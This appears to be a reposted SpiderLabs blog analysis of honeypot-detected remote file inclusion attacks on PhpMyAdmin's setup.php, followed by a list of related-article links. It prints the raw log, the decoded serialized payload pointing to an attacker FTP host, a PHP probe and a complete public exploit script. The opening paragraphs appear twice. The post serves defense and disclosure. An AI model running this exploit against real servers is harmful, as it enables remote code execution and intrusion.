PhpMyAdmin setup.php RFI Attacks Detected
2012-04-23 20:19
826 查看
SpiderLabs is the corporate sponsor of the
WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our central
ModSecurity AuditConsole logging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the
PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.
Let's look at the raw ModSecurity audit log data of the inbound request:
If we URL decode the request body data, we get this:
As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site. The contents of the id.txt file is PHP code:
Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack. If the application responds with the output from these PHP commands, then the attacker will proceed with
other attacks. SpiderLabs Research was able to find the following script in public forums that launch similar attacks:
This
issue was patched in the php source code with the following update:
By filtering out non-word characters, it would prevent the attacker from injecting the RFI code.
WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our central
ModSecurity AuditConsole logging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the
PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.
Let's look at the raw ModSecurity audit log data of the inbound request:
--4064df0e-A-- [10/Apr/2012:18:05:55 +0000] T4R2gwowybkAAHp9G@sAAAAF 212.24.61.167 38767 XXX.XXX.XXX.XXX 80 --4064df0e-B-- POST /pma/scripts/setup.php HTTP/1.1 Connection: close Host: 176.34.207.219 Referer: 176.34.207.219 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] Content-Type: application/x-www-form-urlencoded Content-Length: 238 --4064df0e-C-- action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22ftp%3A%2F%2Fthewinecompany%3AgXNbUEwfLa%4046%2E32%2E228%2E222%2F%2Ea%2Fid%2Etxt%22%3B%7D%7D
If we URL decode the request body data, we get this:
action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1: {s:6:"source";s:55:"ftp://thewinecompany:gXNbUEwfLa@46.32.228.222/.a/id.txt";}}
As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site. The contents of the id.txt file is PHP code:
<?php print(base64_decode("c3Q0cjc=")); echo(php_uname()); print(base64_decode("ZjFuMTVo")); die; ?>
Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack. If the application responds with the output from these PHP commands, then the attacker will proceed with
other attacks. SpiderLabs Research was able to find the following script in public forums that launch similar attacks:
/* wtf zmeu was here haha,yeah me... found this sh*t bug on pmasux */ $arguments = getopt("a:b:c"); $pma_setup_url = $arguments[a]; //echo $arguments[a]; $ftp_code = 'ftp://devil:devil@85.10.138.51/c.txt'; //$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '') { $return = ''; $feof_count = 0; $parsed_url = parse_url($url); $site = $parsed_url; $path = $parsed_url; $query = $parsed_url; ($method == 'GET' && !empty($data)) ? $path .= '?'.$data : ''; ($method == 'POST' && !empty($query)) ? $path .= '?'.$query : ''; $fp = fsockopen($site, 80, $errno, $errstr, 30); ($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n"; $out .= "Host: $site\r\n"; $out .= "Content-type: application/x-www-form-urlencoded\r\n"; $out .= "Connection: Close\r\n"; $out .= "User-Agent: $ua_string\r\n"; $out .= "Referer: $referer_string\r\n"; $out .= "Cookie: $cookie_string\r\n"; ($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n"; ($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out); while (!feof($fp)) { if($feof_count >=200) break; $return .= fread($fp, 4800); ++$feof_count; } fclose($fp); return $return; } $token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera'); preg_match('@name="token" value="(a-f0-9{32})"@is',$token_page,$token_array); $token = $token_array[1]; preg_match_all('@Set-Cookie: (^\r\n;+)@is',$token_page,$cookie_array); $cookie_array = $cookie_array[1]; $cookie_array = implode("; ",$cookie_array); print send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');
This
issue was patched in the php source code with the following update:
By filtering out non-word characters, it would prevent the attacker from injecting the RFI code.
相关文章推荐
- phpMyAdmin setup.php脚本PHP代码注入漏洞
- phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
- phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via A Crafted POST Request CVE-2010-3055
- phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via unserialize Vul Object Injection PMASA-2010-4
- 在Ubuntu中使用源码编译安装Apache+MySQL+PHP+phpMyAdmin
- CentOS+Apache+PHP+Mysql+Zend Optimizer+eaccelerator+phpmyadmin
- phpmyadmin 提示“无法加载 mcrypt (外链,英语) 扩展,请检查您的 PHP 配置”
- Ubuntu 12.04 LTS 下安装apache+php+mysql+phpmyadmin
- win7(32位、64位)中配置iis7.5+php+mysql+zend+phpmyadmin
- php环境配置 php5 mysql5 apache2 phpmyadmin安装与配置
- CentOS5 中安装 php 后启动 apache 报错:undefined symbol: xmlTextReaderSetup
- Nginx+PHP+MySQL+phpMyAdmin 环境搭建与使用(12.04.4 LTS)
- 在CentOS中快速安装PHP,MySQL,Nginx和phpMyAdmin
- Mac OS X Mavericks or Yosemite 安装Nginx、PHP、Mysql、phpMyAdmin
- Apache+PHP+PhpMyAdmin+MySql配置
- apache、php、mysql和phpmyadmin安装及环境配置
- windows下Apache+mysql+php+phpMyAdmin的安装及配置
- ZooKernel/Embed/PHP Setup